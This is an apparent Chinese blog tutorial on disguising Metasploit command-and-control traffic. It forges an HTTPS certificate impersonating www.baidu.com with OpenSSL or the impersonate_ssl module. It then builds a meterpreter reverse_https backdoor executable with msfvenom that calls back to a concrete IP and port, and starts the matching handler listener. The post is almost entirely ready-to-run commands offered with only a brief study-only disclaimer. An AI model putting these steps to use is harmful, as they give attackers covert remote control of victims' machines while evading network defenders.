MSF-流量通讯特征修改-证书-OpenSSL&impersonate_ssl

免责声明:本文仅做技术交流与学习...

目录

步骤:

[1-利用 openssl 生成证书](#1-利用 openssl 生成证书)

[1-impersonate_ssl 模块 --生成证书](#1-impersonate_ssl 模块 --生成证书)

​编辑

[2.MSF 生成绑定证书后门:](#2.MSF 生成绑定证书后门:)

[3.MSF 监听上线:](#3.MSF 监听上线:)

证书伪造

https流量加密


-解决 HTTPS-SSL 通讯证书被特征标示问题

步骤:

1-利用 openssl 生成证书

复制代码
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=xiaodi/L=xiaodi/O=Development/CN=www.baidu.com" -keyout www.baidu.com.key -out www.baidu.com.crt && cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem && rm -f www.baidu.com.key www.baidu.com.crt

1-impersonate_ssl 模块 --生成证书

复制代码
此外 Metasploit 框架还有一个 auxiliary/gather/impersonate_ssl 模块,可以用来自动从信任源创建一个虚假证书,十分方便: 
use auxiliary/gather/impersonate_ssl 
set RHOST www.baidu.com 
run 
--->.pem


2.MSF 生成绑定证书后门:

复制代码
msfvenom -p windows/meterpreter/reverse_https LHOST=47.94.236.117 LPORT=5566 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell 
HandlerSSLCert=/root/www.baidu.com.pem StagerVerifySSLCert=true -f exe -o https-b.exe 

3.MSF 监听上线:

复制代码
use exploit/multi/handler 
set payload windows/meterpreter/reverse_https 
set lhost 0.0.0.0 
set lport 5566 
set HandlerSSLCert /root/www.baidu.com.pem 
set StagerVerifySSLCert true 
run 

---可以访问https看看证书

证书伪造


https流量加密


相关推荐
宁小法6 分钟前
HTTP 请求中断的深度扩展知识
网络·网络协议·http
言之。26 分钟前
ClickHouse 数据更新策略深度解析:突变操作与最佳实践
服务器·数据库·clickhouse
火星数据-Tina1 小时前
LOL实时数据推送技术揭秘:WebSocket在电竞中的应用
网络·websocket·网络协议
北京耐用通信1 小时前
电力自动化新突破:Modbus如何变身Profinet?智能仪表连接的终极解决方案
人工智能·物联网·网络安全·自动化·信息与通信
Guheyunyi1 小时前
风险感知中枢:监测预警系统的架构与核心
大数据·运维·安全·重构·架构·自动化
ajassi20001 小时前
开源 Linux 服务器与中间件(三)服务器--Nginx
linux·服务器·开源
wheeldown1 小时前
【Linux】Linux进程间通信:命名管道(FIFO)的模拟实现重要知识点梳理
linux·运维·服务器
Crazy________2 小时前
34部署LNMP架构详细解析
linux·运维·服务器·nginx
汤愈韬2 小时前
NTFS权限基础、权限累加规则、权限继承规则
windows·网络安全
tan180°2 小时前
Linux网络HTTP(上)(7)
linux·网络·http